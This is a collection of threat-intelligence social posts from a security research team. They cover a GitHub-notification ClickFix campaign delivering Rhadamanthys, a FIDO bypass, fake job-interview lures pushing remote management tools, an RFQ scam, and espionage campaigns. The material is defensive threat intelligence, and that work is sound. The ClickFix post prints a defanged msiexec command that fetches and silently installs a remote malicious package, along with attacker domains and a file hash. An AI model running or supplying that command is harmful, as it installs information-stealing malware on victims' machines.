| Threat Insight Blogs | https://www.proofpoint.com/us/blog/threat-insight |
| Threat Insight on X | https://twitter.com/threatinsight |
Something #spicy is coming to the next Only Malware in the Building podcast—dropping September 2. 🌶️
Bookmark the show page and reserve your seat at the table 🪑 alongside @selenalarson, Dave Bittner and Keith Mularski.
🔥 You won't want to miss it! https://thecyberwire.com/podcasts/only-malware-in-the-building
Proofpoint identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys.
We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. https://infosec.exchange/@anyrun_app/115019769476243964
We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they have been tagged, with the text from the issue.
The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to verify they are human.
Following the instructions will initiate a command that downloads and executes malware.
The specific malware may vary throughout the campaign.
At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.
Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject.
CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.
CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.
Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn
Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2
Example system commands:
C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe
Bitly redirect: hxxps://gitsecguards[.]com
ClickFix Landing domain: security[.]flaxergaurds[.]com
Organizations are encouraged to restrict PowerShell to only approved administrative users.
Proofpoint threat researchers have uncovered a way to sidestep FIDO-based authentication, a protection method used to block credential phishing and account takeover (ATO).
While the tactic has not yet been observed in the wild, the discovery is a significant emerging threat and exposes targets to adversary-in-the-middle (AiTM) threats.
Read our blog to understand how this potential threat questions the reliability of FIDO (Fast Identity Online) passkey implementations, an authentication method currently viewed as robust for verifying user identities and recommended for improving online security.
Every threat actor group has its own unique tactics, techniques, and procedures (TTPs). For example, during #taxseason, #TA558 pivots from its typical reservation-themed email lures to target financial firms with tax-related lures.
#TA2541 is known to consistently target organizations in the aerospace, manufacturing, and defense industries using remote access trojans (RATs).
#TA582's TTPs feel like a digital jigsaw puzzle, with simultaneous email, web inject, and compromised site vectors.
Stream this DISCARDED podcast episode to hear all about the chaotic brilliance of mid-tier eCrime actors. https://www.proofpoint.com/us/podcasts/discarded#143240
🚨 Job Seekers, watch out! 🚨 Proofpoint researchers have observed multiple email campaigns impersonating job interview invites from real companies and recruiters.
These emails claim to offer opportunities via Zoom or Teams, but instead lead recipients to install remote management tools (RMM) like SimpleHelp, ScreenConnect, or Atera.
Here's what you need to know:
💻 What’s the threat?
While RMM tools are used legitimately by IT teams, in the hands of cybercriminals, they function like remote access trojans (RATs)—granting attackers full access to your computer, data, and finances.
📬 In one case, a hacked LinkedIn account posted a real job description but swapped in a malicious Gmail address. Proofpoint later discovered this address being used to send fake interview invites to job seekers who had applied.
🔍 How are they doing it?
Threat actors may:
• Create fake job listings to harvest emails
• Hack recruiter inboxes or LinkedIn accounts
• Use lists of stolen email addresses
🎯 This trend is part of a broader wave of cyberattacks where RMM/RAS (remote access software) is used as the initial payload—blending in with normal traffic before launching further attacks like data theft or ransomware.
⚠️ If you're job hunting, stay alert:
• Double-check email sender names and domains
• Be wary of .exe files or suspicious URLs
• If something feels off, trust your instinct
Read more from our threat research team on threats using RMM tools: https://www.proofpoint.com/us/blog/threat-insight/remote-monitoring-and-management-rmm-tooling-increasingly-attackers-first-choice
Proofpoint threat researchers released new details on a widespread Request for Quote (RFQ) scam that involves leveraging common Net financing options to steal a variety of high value electronics and goods.
To understand how the scam works, our researchers posed as suppliers with lax finance departments and engaged directly with threat actors.
Step into the mind of a cybercriminal and read all about the anatomy of the scam in this blog: https://www.proofpoint.com/us/blog/threat-insight/net-rfq-request-quote-scammers-casting-wide-net-steal-real-goods
New Proofpoint threat research revealed an increase in China-aligned cyber #espionage targeting Taiwan’s #semiconductor industry—a sector critical to the global tech #supplychain.
At least 3️⃣ distinct China-aligned threat actors are behind the efforts.
These campaigns likely reflect China’s strategic push for semiconductor self-sufficiency amid tightening US and Taiwanese #export controls.
See this new blog for a breakdown of the tactics, tools, and implications: https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting
Key findings Between March and June 2025, Proofpoint Threat Research observed three Chinese state-sponsored threat actors conduct targeted phishing campaigns against the Taiwanese
Espionage 🤝 Cybercrime :: TA829 🤝 UNK_GreenSec
Our extensive visibility into the threat landscape has led us to conclude that there is very likely a link between TA829 (a cybercriminal actor also conducting #espionage in line with Russian state interests) & UNK_GreenSec (a #cybercriminal cluster observed deploying #malware and #ransomware).
See our research blog for a technical analysis of the intriguing overlap between the threat actor clusters. https://brnw.ch/21wTN3n
